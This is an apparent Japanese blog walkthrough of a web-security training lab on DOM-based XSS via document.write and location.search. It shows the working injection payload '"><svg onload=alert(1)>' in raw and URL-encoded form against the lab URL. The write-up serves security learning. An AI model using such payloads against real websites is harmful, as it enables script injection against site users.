Hello there, ('ω')ノ

 

ソースlocation.searchを使用したdocument.writeシンクのDOMXSSを。

 

まずは、動作確認を。

ちなみにURLは以下のようになって。

　https://ac241ff41e83c874803c0bcb00a70097.web-security-academy.net/?search=test

 

 

レスポンスボディを見るとスクリプトを介していることがわかって。

 

下記を入力して、document.write('<img src="～を閉じてスクリプトを実行することに。

　"><svg onload=alert(1)>

 

実行時のURLは、以下のとおりで。

https://ac241ff41e83c874803c0bcb00a70097.web-security-academy.net/?search=%22%3E%3Csvg+onload%3Dalert%281%29%3E

 

デコードした結果は、以下のとおりで。

https://ac241ff41e83c874803c0bcb00a70097.web-security-academy.net/?search="><svg onload=alert(1)>

 

 

クリアできた。

 

 

Best regards, (^^ゞ